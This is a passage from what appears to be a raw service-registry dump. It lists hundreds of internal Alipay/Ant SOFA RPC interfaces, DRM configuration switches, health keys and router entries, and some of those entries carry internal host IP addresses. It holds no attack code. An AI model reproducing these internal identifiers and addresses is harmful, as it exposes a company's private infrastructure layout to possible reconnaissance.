ULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.agreement.CreateUsageAgreementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.ResourceRelationService:1.0:resourceRelationService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.instinfo.service.facade.info.InstInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ucdp.common.service.facade.query.CreativeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tbf.model.service.IPluginService:1.0:tbfins@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.reservation.ContentSecCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcomment.common.service.facade.api.vote.VoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.product.FinProductKvStaticInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.createBlackUser,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:autoinsprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.label.api.AILabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.AntSearchContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.trustlife.tis.mutual.claim.facade.endpoint.PublicityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.16.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.content.service.facade.KeywordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.service.query.api.AccenterLedgerQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.switcher.zprodqueryTairCacheCZone.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinsight.service.api.rptcfg.ReportDataSetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.trServerMonitorIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetcore.common.service.assetcore.zcb.facade.ZCBAssetBatchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.paramcore.common.service.manage.facade.api.ParmInstanceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinsnsprod.biz.service.gw.community.api.wealthscore.WealthScoreInfoManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:bigfish#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpwm.facade.service.CapitalPlanDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.test.PressTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RcHgCompanyTreasuryFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.shopParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobench.common.service.facade.service.OpsChangeCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.facade.meta.service.MetaDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcredittrans.facade.personloan.api.PlctransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.common.service.facade.TripleHessianInterface:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.mng.AbilityDemoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskOperateHistoryQueryService:1.0:sofa4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.MerchantVipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_FRSERVCENTER_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.paycore.service.payment.xtrans.PayToolFinalizeInZoneService:1.0:couponcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.184.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zcache.tbase.workflowxTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.184.81#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipsponsorprod.biz.protect.service.pot.ProtectPotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_PCREDITTRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.DeveloperManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@ideploy#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.zqueue.client.flowctrl6015#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.point.api.PttransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.PartnerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.apshopcenter.common.service.facade.RemoteDebugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.uctmonitor.api.UctStrategyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsRenderDrmClient.renderEngineSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.24.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.PermissionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:seachportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-F-SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.177.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:overseaexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.216.77#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchiswisdom.msg.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.engine.facade.runtime.UfeFeatureCalService:1.0:bkfeaturecloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.warehouse.vdps.facade.VdpsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.core.drm.CoreOrderExecuteDRMResource.startAndEndHourForUnFinishedStatistics,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.distribute.ServiceResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.PhoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_ZIAN_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:kbdish@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.mng.MaterialMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:alisisai@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iinnertrans.facade.api.InnerAccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.loadTestStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instasset.common.service.facade.ins.InsInstQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobatch.common.service.task.facade.TaskOperationManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.csbizcenter.facade.PolymerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.findecision:name=com.alipay.findecision.biz.shared.SystemConfig.printInfoLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoplaycenter.common.signtask.facade.api.SignInQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:aeicoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.196.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ctu:name=com.alipay.ctu.common.service.facade.ldc.SecurityLdcSwitchResource.switchZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.ManualOrderFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.search.MetaSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopencore.common.service.manager.RouterConfigDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxposition.service.facade.eod.PositionAdjustFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.razor.scheduler.service.RazorSchedulerInstanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dwalm.facade.api.FmALInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkcloudfunds.service.facade.depository.api.AccountChangeSubcribeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulescanner.common.service.facade.RuleScannerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_finishOperateOrderCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.YebTimingTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.CommonCommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.ZbdmMetaTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.useMethodSignatureAsTaskName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.sceneinvest.share.api.SceneInvestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CompanyCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdlib.velocity.service.VelocityDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.pointlibrary.api.PointBudgetLibServiceAdapter:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.CreditInstManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.searchAnswer.facade.SearchAnswerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.TdatBizSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatMessageQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.shopminiapp.facade.api.query.ShopOperatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nebulamng.JetApp:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.212.134.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.predictproxy.biz.prediction.http.HttpPredictionService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.spcenter.facade.tool.BusinessRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskcontrol.market.consumer.facade.FeatureQueryingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.troublehunter.common.service.facade.api.fault.diagnosis.LegoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbpdcenter.common.service.facade.ProdSwitchManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcube.common.service.facade.openapi.upgrade.UpgradeTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.aip.service.drm.FPASwitchConfigDrm.errorCodeMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.224.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.trsbrain.common.service.facade.service.CureReplayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.transport.TransportStrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.ha.FinHaStatisticQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.SelfServiceTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dchainprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mremindprod.common.service.facade.BaikeMatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.spi.cc.CcInfoSpiFacade:1.0:promoplaycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.GdDataSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.30.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.card.api.InstMoodFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_SC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.koiPrizeWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-unibase-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.service.facade.service.spi.ExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finaicontentcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.aliinvoiceprod.common.service.facade.manager.api.EinvReimbursementIsvInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.market.CouponOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.CardMigrationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmodelops.common.service.facade.api.FinDataLookupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mpaasafts@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.dw.service.TaskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.175.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchcommons.thunderbird.facade.MessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.234.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.decisionx.facade.api.DxTenantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.157.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.46.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.redeemBeforeHandExecDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:lyra-playground#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscommunity.common.service.facade.LoveHelpGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.jiaofei.CommunityIsvFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trsdesk.common.service.facade.biz.DrillFaultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanmarket.common.service.facade.beike.BeikeBenefitDayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gray:name=com.alipay.grayprod.change.drm.ChangePolicy.statusChangePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.octopus.core.facade.ServiceInfoQueryFacade:1.0:opensupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:qconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.loadTestSampleBizAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.poscore.core.service.decision.FinanceServicePushConfig.pushServiers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.116.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_INSCOMMUNITY#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.192.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bpaas.ecomerchant.facade.region.admin.RegionQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.runtime.indicator.aggregation.IndicatorPreAggregationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.accountcancel.AccountCancelOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchdt.da.common.service.facade.api.NameListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantSearchQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.calendar.MockDrillCaseFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.177.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minicenter.common.service.facade.api.antcloud.MiniAppAntcloudOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.secretary.WorkAssistantSceneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","keymap@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.kwlib:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.pipeline.common.facade.core.plugins.PipelinePluginOpenService:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:infostudio@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Notify_SubscriptionInfo_BindingTP_POLYMER_APPLY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.meta.MetaDrmDataIdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.zhima.ZhiMaScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.video.api.YoukuVideoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.146.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_F_ICIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchservbase.biz.service.mrchlevel.facade.MrchlevelServiceFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:omoaidbase_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.cache.service.CacheRefreshConfigCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.signcontract.SignContractFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_SERVERLESS_SCRIPT_EXECUTE_TASK_NONE_AIG@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoadprod.common.service.AdvertisementPlaceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.facade.store.query.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:minitranscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryAccBalanceCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.nozone.NoZoneRouteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.api.UnfreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcia.common.service.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.SolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.8.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.frdecision.common.service.facade.api.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.fake.facade.ifacade.DecisionValidationFacade:1.0:fakeDecisionValidationFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.prodsale.ProdSaleConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcateringprod.common.service.facade.channel.api.CateTakeShopChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinBusinessSumRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.event.MerchantEventFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOF